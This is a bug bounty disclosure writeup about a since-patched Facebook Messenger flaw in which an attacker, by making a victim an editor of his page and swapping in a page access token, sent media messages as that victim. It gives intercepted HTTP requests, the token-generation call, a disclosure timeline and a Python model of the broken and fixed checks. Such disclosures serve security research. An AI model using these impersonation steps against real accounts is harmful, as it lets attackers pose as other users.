Kassem Bazzoun

Published On: 19 May 2019


Sending messages on behalf of other users

Messenger | Android

An attacker is able to send media messages on behalf of other users on Facebook Messenger by making the victim an admin/editor/moderator on his Facebook Page. The attacker then intercepts the request Messenger makes while he uploads a photo/video/audio to someone, changes the token in the Authorization header to a "Page Token", and sets sender_fbid to the victim's (admin) id.


This could have allowed a malicious user to send media messages on behalf of other users by making them (the victims) admins on his page.

Reproduction Steps



  • "Kassem Bazzoun" is the attacker
  • "Semi Colon" is the victim
  • "Kassem Bazzoun" made the victim "Semi Colon" an editor on his page


Intercept Requests

An attacker can capture these requests while sending an image/voice/video in Facebook Messenger (Android/iOS).

Focus on the Authorization header and the parameters sender_fbid / to.

  • Photos 
POST /messenger_image/3e8cde28c9b2d9112e9c87af9b71fbc56528664348207412316 HTTP/1.1
Authorization: OAuth EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphk.........DgWUkgTUyMBUvs
original_timestamp: 1556554877552
sender_fbid: victim_id 
to: receiver_id
Accept-Encoding: gzip, deflate


  • Video Request
POST /messenger_video/83e5ecba32f23sfd09a99f33b96529102120235284153 HTTP/1.1
X-Entity-Name: VID-20190430-WA0150.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
Authorization: OAuth EAAGNO4a7r2wBAJJXT1VkfYFfwdf9ZCpSxfcGpfi3azopoTlEvYEZC3639cIVmKefBhvKXadoD17GMt7t3Xx.........eTfcjUHvQZDZD
media_hash: 4dc51a78fd7e39ab3369ddd3873d4d1794b499621a1bd48d867c05c1a6ce65a5
X-FB-Net-HNI: 41503
attempt_id: 6529102120248812254
send_message_by_server: 4
app_id: 256002347743983
Content-Type: application/octet-stream
offline_threading_id: 65291021202332323
X-FB-Connection-Quality: GOOD
sender_fbid: victim_id
to: receiver_id
X-FB-SIM-HNI: 41503


  • Voice Message Request
POST /messenger_audio/a174a21348fb713ab40a796e63232fs0986529693648684848294 HTTP/1.1
X-Entity-Name: USER_SCOPED_TEMP_DATA_orca-audio-1556800271887.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/touch;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
duration: 9811
Authorization: OAuth EAADo1TDZCuu8BANUYHkTMK4SxtTRPbqtIgIuUShTWmsHujjEVIRELxlk5eiZCnA36hSgKl9gjjFJlmuMH3KYy6DlGOhojRZCDHjBZAyMEw0gLut6V4dEFaViofLKELJENiBBjW8SmMZCRho0A6Fq9ZBKXVIuf8nGPZAywnaqjunqwZDZD
X-FB-Net-HNI: 41503
attempt_id: 6529693648683742874
sender_fbid: victim_id
to: receiver_id



Kassem (the attacker) changed the token in the Authorization header of the request to his "Page Token": he took the token from the previous Authorization header and generated the page token from it via the Graph API Explorer.


To get the page access token, send the following request:

  • ACCESS_TOKEN = the token for Facebook Messenger (the one from the intercepted Authorization header)
  • GET /v3.2/page_id?fields=access_token

This request should return:

{
  "access_token": "EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphkkZBv15yb7FNy357AcxAtjZCSrjFkL35muO3h3dZB2zlSZBOiS.....",
  "id": "page_id"
}



So replace the Authorization token with the new one.

Note: you should generate a "Page Token" for a page on which both you and the victim are admins.



After changing the Authorization header to the page token, I was able to send media messages on behalf of any admin of that page. The server did not check whether the token belonged to that admin; it only validated that the user in sender_fbid had a role on the page the token belonged to, and never checked who had generated the token! :)

So let's change the parameters now :)

sender_fbid: the parameter that indicates which user sent this message (the sender id). Change it to the victim id (the admin id).

to: the parameter that indicates who receives this message (the receiver id).


Finally, send the request!

I sent the message from the victim's account (Semi Colon) to myself!

I can also send the message to any other user, not only to myself!

Imagine someone sending a message from your account to another user!




This is an example of how I sent a message on behalf of my friend (of course, I got his permission before testing on his account).



Facebook fixed the vulnerability by preventing any user from using a "Page Access Token" to send messages on behalf of any admin, including your own account, so a page access token can now only be used to send messages on behalf of the page itself. New server reply: {"err_code":"1545003","err_str":"You cannot perform that action."}
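The root cause described above (the server only checked that sender_fbid held a role on the token's page, never who the token was issued to) and the fix (a page token may act only as the page itself) can be modelled as two small authorization checks. The following Python is an added illustration, not Messenger's code; the Token shape, the role table, the ids and the check functions are all constructed assumptions, and only the error body is taken from the writeup.

```python
"""Model of the token-to-sender binding check from the writeup.

Everything here is a constructed illustration: the Token shape, the
PAGE_ROLES table, the placeholder ids and both check functions are
assumptions, not Messenger's server logic. Only the error body is the
one the writeup quotes from the patched server.
"""
from dataclasses import dataclass
from typing import Callable, Dict, Optional

# Placeholder ids (constructed, not real Facebook ids).
PAGE_ID = "page_id"
ATTACKER_ID = "attacker_id"
VICTIM_ID = "victim_id"
RECEIVER_ID = "receiver_id"
OUTSIDER_ID = "outsider_id"


@dataclass(frozen=True)
class Token:
    """Resolved view of an access token after the server looks it up.

    issued_to: the user the token was minted for.
    page_id:   set when this is a Page Access Token minted by that user;
               None for a plain user token.
    """
    issued_to: str
    page_id: Optional[str] = None


# Who holds a role on which page (constructed). The victim was added as
# an editor by the attacker, exactly as in the reproduction steps.
PAGE_ROLES: Dict[str, Dict[str, str]] = {
    PAGE_ID: {ATTACKER_ID: "admin", VICTIM_ID: "editor"},
}


def has_role(user_id: str, page_id: str) -> bool:
    return user_id in PAGE_ROLES.get(page_id, {})


def vulnerable_check(token: Token, sender_fbid: str) -> bool:
    """Pre-fix logic as the writeup describes it.

    A page token is accepted for ANY sender_fbid that has a role on the
    token's page; the user who minted the token is never consulted.
    """
    if token.page_id is None:
        return sender_fbid == token.issued_to
    return has_role(sender_fbid, token.page_id)


def fixed_check(token: Token, sender_fbid: str) -> bool:
    """Post-fix logic: a page token may only send as the page itself, and
    a user token may only send as the user it was issued to. Note that
    even the token's own minter can no longer use a page token to send as
    themselves, matching "including your account" in the writeup."""
    if token.page_id is None:
        return sender_fbid == token.issued_to
    return sender_fbid == token.page_id


# Error body quoted in the writeup from the patched server.
ERR_CANNOT_PERFORM = {"err_code": "1545003",
                      "err_str": "You cannot perform that action."}


def handle_upload(check: Callable[[Token, str], bool], token: Token,
                  sender_fbid: str, to: str) -> dict:
    """Apply the chosen check to an upload request's sender_fbid/to pair
    and return either the accepted message record or the error body."""
    if not check(token, sender_fbid):
        return ERR_CANNOT_PERFORM
    return {"from": sender_fbid, "to": to}


if __name__ == "__main__":
    page_token = Token(issued_to=ATTACKER_ID, page_id=PAGE_ID)
    for name, check in (("vulnerable", vulnerable_check),
                        ("fixed", fixed_check)):
        print(name, "sender=victim:",
              handle_upload(check, page_token, VICTIM_ID, RECEIVER_ID))
        print(name, "sender=page:  ",
              handle_upload(check, page_token, PAGE_ID, RECEIVER_ID))
```

The check that closes the hole is the binding between the token and the identity in sender_fbid: a role on the page is a property of the victim, not of the token, so it says nothing about who is holding the token. The fixed check therefore ignores the role table entirely and compares sender_fbid against the principal the token was issued for.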


Kassem 29 Apr 2019

Initial Report

Facebook 03 May 2019

Pre-triage: Thank you for your submission. We've managed to reproduce your report and will get back to you once we have had a chance to investigate.

Facebook 07 May 2019

Triaged: Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will keep you upd...

Facebook 07 May 2019

Responsible Disclosure Policy: In the meanwhile just a remind to please follow the guidelines of the responsible disclosure policy and refrain from demonstrating this vulnerabi...

Facebook 17 May 2019

Bug Fixed: We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch does not res...

Kassem 18 May 2019


Facebook 18 May 2019

Bounty Awarded: After reviewing this issue, we have decided to award you a bounty of $7500. Below is an explanation of the bounty amount. Facebook fulfills its b...